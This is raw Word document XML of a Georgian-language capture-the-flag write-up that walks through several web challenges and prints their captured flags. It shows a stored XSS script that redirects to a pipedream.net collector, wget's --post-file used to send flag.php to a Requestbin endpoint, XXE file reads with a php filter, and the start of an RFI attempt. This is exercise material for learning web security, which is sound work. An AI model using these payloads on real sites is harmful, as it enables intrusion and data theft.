          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">-ს </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF45F9">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>ფაილების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ჩამოსატვირთად</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF45F9">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF45F9">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>რომლი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რთერთ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პარამეტრ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არის</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF45F9">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> --post-file </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF45F9">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>რომელიც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ერვერიდან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ატვირთავ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lastRenderedPageBreak/>
        <w:t>სამიზნ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ერვერზე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ფაილს</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF45F9">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF45F9">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>შეგვიძლი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ჩვენ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საწყის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ოთხოვნა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გავაყოლო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ეს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მატებით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პარამეტრი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და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მოვითხოვოთ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF45F9">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF45F9">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>flag.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4A51E6D8" w14:textId="06B5927A" w:rsidR="00EF45F9" w:rsidRPr="00EF45F9" w:rsidRDefault="00EF45F9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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>flag.php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საიტის სორს კოდში ვიპოვეთ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3029496A" w14:textId="55804E7E" w:rsidR="0026055B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36501B5B" wp14:editId="469638D8">
            <wp:extent cx="5943600" cy="2940685"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="110460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053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F01F" w14:textId="331C9119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ის გაწერით გვანახებს საიტი რომ ვალიდაციას აკეთებს და ამას რაღაცნაირად გვერდი უნდა ავუაროთ, ჩვენ უკვე ვიცით რომ შეგვიძლია ტილდა ჩავამატოთ და ვცადოთ ‘.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A376EF7" w14:textId="4E6C0DC3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258D26D" wp14:editId="5611511C">
            <wp:extent cx="5943600" cy="5372100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1228674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7462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DEC" w14:textId="6B981CC4" w:rsidR="00B65A0C" w:rsidRDefault="00B65A0C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იგზავნა და გაატარა ვალიდაციამ ანუ იმუშავა ამ ვარიანტმა. ვნახოთ რა მივიღეთ </w:t>
      </w:r>
      <w:r w:rsidRPr="00A94F9A">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t xml:space="preserve">Requestbin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>ში.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B65A0C">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45946DE2" wp14:editId="6371CF7F">
            <wp:extent cx="5943600" cy="835025"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="729264373" name="Picture 1" descr="A white rectangular object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4373" name="Picture 1" descr="A white rectangular object with a white bord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1558" w14:textId="27FFBA19" w:rsidR="00B65A0C" w:rsidRDefault="00B65A0C" w:rsidP="00EF45F9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B65A0C">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>DCTF{6789af26f90396678909a99bf46ba3a78b2f1b349fbc4385e6c50556c1d0c9ff}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E4AF94" w14:textId="77777777" w:rsidR="006C70AB" w:rsidRDefault="006C70AB" w:rsidP="00EF45F9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3588437B" w14:textId="7DF35462" w:rsidR="006C70AB" w:rsidRDefault="006C70AB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4.</w:t>
      </w:r>
      <w:r w:rsidR="00A94F9A">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>manual review</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430371A7" w14:textId="7FC5C268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დივართ მოცემულ მისამართზე და გვხვდება სარეგისტრაციო</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t xml:space="preserve"> და </w:t>
      </w:r>
      <w:r w:rsidRPr="00A94F9A">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>საავტორიზაციო ფეიჯი.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59409147" w14:textId="2571AAA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14AC4F44" wp14:editId="73E09DE0">
            <wp:extent cx="5943600" cy="5328285"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="112217345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3457" name="Picture 1" descr="A screenshot of a login for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9B6A" w14:textId="7A7556C9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ეგისტრაციის შემდეგ გადაგვიყვანა მთავარ გვერძე</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AA3200" w14:textId="77777777" w:rsidR="00A94F9A" w:rsidRDefault="00A94F9A" w:rsidP="00A94F9A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3459CF1E" w14:textId="1EB6F4B2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BD6057C" wp14:editId="338750BB">
            <wp:extent cx="5943600" cy="1899285"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="896231019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31019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26A" w14:textId="47573381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ოცემულია ასევე ქვემოთ ველი რომ დავუტოვოთ მესიჯი ადმინისტრატორებს.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDE5423" w14:textId="29F9CD9D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ვიყვანოთ რაიმე უბრალოდ იმის სანახავად თუ საერთოდ რას შვრება ეს ველი.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF29123" w14:textId="1A878291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5BA8A84D" wp14:editId="1E51D626">
            <wp:extent cx="5943600" cy="2561590"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1896522156" name="Picture 1" descr="A white shelf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2156" name="Picture 1" descr="A white shelf on a white su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4C6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გამოიტანა ქვემოთ როგორც თითქოს რაღაც თიქეთი სოლუშენისთვის, მოდი ვცადოთ რაიმე სკრიპტის გაშვება იქნებ მუშაობს.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A3F492" w14:textId="540828E3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მაგალითისთვის ავიღოთ ალერტის გაგზავნა: &lt;script&gt;alert(1);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5F10E7" w14:textId="67BB9EA6" w:rsidR="00B65A0C" w:rsidRDefault="00B65A0C" w:rsidP="00EF45F9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="319209ED" w14:textId="4A32E4EC" w:rsidR="00A94F9A" w:rsidRDefault="00A94F9A" w:rsidP="00EF45F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დიახ იმუშავა ამ სკრიპტმა</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147B93AE" w14:textId="210174DA" w:rsidR="00A94F9A" w:rsidRDefault="00A94F9A" w:rsidP="00EF45F9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4FEC9900" wp14:editId="42B66B9E">
            <wp:extent cx="4267796" cy="1295581"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="21150160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16027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4F72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ეს პირდაპირ მეტყველებს იმაზე რომ შეგვიძლია მივმართოთ XSS ხერხს.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6084A4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ross site scripting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467B8562" w14:textId="5B9C25EC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შეგვიძლია მივმართოთ კალი ლინუქსში Ngrok-ს და კიდევ საიტს რომელიმეს რომელსაც შეუძლია მსგავსი ფუნქცია, მაგალითისთვის requestbin და ვცადოთ ამ სკტიფტში ამის იმპლემენტაცია ისე რომ მივიღოთ რაიმე გამოსადეგარი ინფორმაცია.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DA5424" w14:textId="69BACF0E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3EA629D2" wp14:editId="64075F5F">
            <wp:extent cx="5943600" cy="2245995"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="173381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44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B75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აკოპირებთ ამ ენდპოინტს.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379A80DE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 xml:space="preserve">ჩავწეროთ შემდეგი სკრიპტი: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4E97E5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script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B25FE7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window.location.href = "https://enscjy1sisrg.x.pipedream.net/";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9FDFA4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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F536A33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lastRenderedPageBreak/>
        <w:t>ამ ბრძანებით პირდაპირ ვეუბნებით რომ გადავიდეს ამ მისამართზე.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1DF547" w14:textId="77777777" w:rsidR="00A94F9A" w:rsidRP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ვნახოთ რა მოხდება</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5935546C" w14:textId="6E577AF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საიტზე მივიღეთ ასეთი წარწერა</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631415DD" w14:textId="53BE66AB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4A759A2B" wp14:editId="1CA83A9E">
            <wp:extent cx="3029373" cy="1305107"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="14647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467" name="Picture 1" descr="A black screen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4AD" w14:textId="62B021CB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ვნახოთ რა მოხდა </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Requestb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ka-GE"/>
        </w:rPr>
        <w:t>ში</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA304EE" w14:textId="3FE456F0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noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35E817B8" wp14:editId="0E15FB38">
            <wp:extent cx="5943600" cy="1724660"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="1771109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091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1D9" w14:textId="5C23AB78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შემდეგი:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3D2054" w14:textId="42111282" w:rsidR="00A94F9A" w:rsidRDefault="00A94F9A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სევე თვალსაჩინოდაც წერია ჩვენი ფლეგი რისთვისაც ვიბრძოლეთ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B035681" w14:textId="074A84D5" w:rsidR="00A94F9A" w:rsidRDefault="00A94F9A" w:rsidP="00A94F9A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A94F9A">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>ctf{4852d6993069867fb5c28b8b688adb6e2b3a9230bfef807ff6ac01b4f216df7f}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA2CAEA" w14:textId="4C5C1F55" w:rsidR="00084C19" w:rsidRDefault="00084C19" w:rsidP="00A94F9A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5714C358" w14:textId="77777777" w:rsidR="00084C19" w:rsidRDefault="00084C19" w:rsidP="00A94F9A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="021B6CCA" w14:textId="04BC3067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t>5.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>syntax-check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18744F11" w14:textId="77777777" w:rsidR="00084C19" w:rsidRDefault="00084C19" w:rsidP="00A94F9A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="349DAEA0" w14:textId="1FCCFE19" w:rsidR="00084C19" w:rsidRDefault="00084C19" w:rsidP="00A94F9A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">მოცემულ აიპიზე გადასვლისას გვხვდება ღილაკი </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Parse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32199C47" w14:textId="0A2B20E8" w:rsidR="00084C19" w:rsidRDefault="00084C19" w:rsidP="00A94F9A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00084C19">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="339A2DA3" wp14:editId="3CD59963">
            <wp:extent cx="2381582" cy="933580"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1773322240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22240" name="Picture 1" descr="A white background with black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BD99" w14:textId="421927C0" w:rsidR="00084C19" w:rsidRDefault="00084C19" w:rsidP="00A94F9A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ჭიროთ და ვნახოთ რა მოხდება.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35616BCF" w14:textId="77777777" w:rsidR="00084C19" w:rsidRDefault="00084C19" w:rsidP="00A94F9A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23B1C40E" w14:textId="0CCE597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თუ კარგად დავაკვირდებით გამოტანილ ტექტსტს და ლინკს შეგვიძლია ვთქვათ რომ ეს არის php პროვაიდერი.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A9C7B7" w14:textId="34E4247B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noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F585854" wp14:editId="6B415997">
            <wp:extent cx="2324424" cy="419158"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="139663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0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EF1" w14:textId="1918A461" w:rsidR="00084C19" w:rsidRDefault="00084C19" w:rsidP="00A94F9A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00084C19">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6166E0BF" wp14:editId="42C8F27A">
            <wp:extent cx="5334744" cy="266737"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="132204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408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1F0A" w14:textId="77777777" w:rsidR="00084C19" w:rsidRP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ახლა კი გამოვიყენოთ XXE ინჯექშენი რათა გავარკვიოთ რომელფაილშია ფლაგი</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDE5290" w14:textId="27168219" w:rsidR="00084C19" w:rsidRDefault="00084C19" w:rsidP="00084C19">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00084C19">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>/var/www/html/flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3290235E" w14:textId="1338F483" w:rsidR="00084C19" w:rsidRDefault="00084C19" w:rsidP="00084C19">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00084C19">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B08F074" wp14:editId="07427CE3">
            <wp:extent cx="5943600" cy="2072005"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="337012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1202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798D" w14:textId="23FFFEFB" w:rsidR="00084C19" w:rsidRDefault="00084C19" w:rsidP="00084C19">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00084C19">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>როგორც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ვხედავ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გამოდი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ასეთ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ტექსტ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აც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მიგვანიშნებ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მაზე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ო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ე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შეიძლებ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ფლაგ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ყოს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მაგრა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საჭირო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რომ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დავშიფრო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იგი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დ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გამოვიყენოთ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შეგვიძლია</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00084C19">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00084C19">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00084C19">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> filte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1EBD0C" w14:textId="058AF163" w:rsidR="007123CB" w:rsidRDefault="007123CB" w:rsidP="00084C19">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007123CB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E5B0BBA" wp14:editId="45DDB137">
            <wp:extent cx="4791744" cy="1276528"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="20199550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5064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26D0" w14:textId="4AB27C0B" w:rsidR="007123CB" w:rsidRDefault="007123CB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მოგვიგდო შემდეგი ჩანაწერი</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007123CB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C4D9B7F" wp14:editId="6DF6669A">
            <wp:extent cx="5943600" cy="285115"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="198523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2383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A51" w14:textId="036E1E28" w:rsidR="007123CB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ბურპის დეკოდერითვე შეგვიძლია გავიგოთ რა არის ჩამალული ამ ტექსტში და ამოგვიგდო ფლეგი</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:br/>
      </w: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3287A14D" wp14:editId="56588816">
            <wp:extent cx="5943600" cy="1943735"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2075837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7353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9397" w14:textId="36A1C89B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ctf{02bd486273026362e8a6961cd3303812073c50fa759b420b1e7a11a2c3ab0130}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C924072" w14:textId="7A4448F9" w:rsidR="003D3A12" w:rsidRDefault="003D3A12" w:rsidP="00084C19">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13A78D70" w14:textId="77777777" w:rsidR="003D3A12" w:rsidRDefault="003D3A12" w:rsidP="00084C19">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DE58F3F" w14:textId="58B487EA" w:rsidR="003D3A12" w:rsidRDefault="003D3A12" w:rsidP="00084C19">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>6.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>ultra crawl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4063C45D" w14:textId="77777777" w:rsidR="003D3A12" w:rsidRDefault="003D3A12" w:rsidP="00084C19">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EDD5851" w14:textId="11F333CB" w:rsidR="003D3A12" w:rsidRDefault="003D3A12" w:rsidP="00084C19">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D3A12">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A16A0E7" wp14:editId="11279390">
            <wp:extent cx="4210638" cy="1038370"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="8446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4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451" w14:textId="77777777" w:rsidR="003D3A12" w:rsidRDefault="003D3A12" w:rsidP="00084C19">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AF47EBD" w14:textId="1B6270A1" w:rsidR="003D3A12" w:rsidRPr="003D3A12" w:rsidRDefault="003D3A12" w:rsidP="003D3A12">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D3A12">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">გვაქვს ველი მოცემული, მაგრამ არ ვიცით როგორ მუშაობს.მოდივცადოთ დაგავწეროთ რამდენად სწორად გადის ჩვენირექვესტი.მაგალითისთვის ავიღოთ </w:t>
      </w:r>
      <w:r w:rsidRPr="003D3A12">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>youtube.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6042EED9" w14:textId="77777777" w:rsidR="003D3A12" w:rsidRPr="003D3A12" w:rsidRDefault="003D3A12" w:rsidP="00084C19">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="085260BC" w14:textId="714EA0E8" w:rsidR="00084C19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</w:rPr>
        <w:t xml:space="preserve">Internal error </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>ზე გადის ამი ჩაწერისას</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7364F246" w14:textId="65E77220" w:rsidR="003D3A12" w:rsidRDefault="003D3A12" w:rsidP="00084C19">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pP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7B122F88" wp14:editId="2220B590">
            <wp:extent cx="5943600" cy="617220"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="86652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213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BB7" w14:textId="7C38B5A7" w:rsidR="003D3A12" w:rsidRDefault="003D3A12" w:rsidP="00084C19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დგან ასეთი გამოუვალი მდგომარეობაა, ჩავხედოთ მინიშნებას რაც გვეუბნება იმას რომ საქმე გვაქვს პროქსისთან და გამოვიყენოთ ბარპი.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8E75CB" w14:textId="0F833F86" w:rsidR="003D3A12" w:rsidRP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სანამ ჩვენ გადავალთ ბარპზე შევეცადოთ იქნებ რაიმე გამოვძალოთ ამ ველს, გვახსენდება რომ არამარტო საიტები არამედ შეგვიძლია </w:t>
      </w:r>
      <w:r w:rsidRPr="003D3A12">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t xml:space="preserve">RFI </w:t>
      </w:r>
      <w:r>
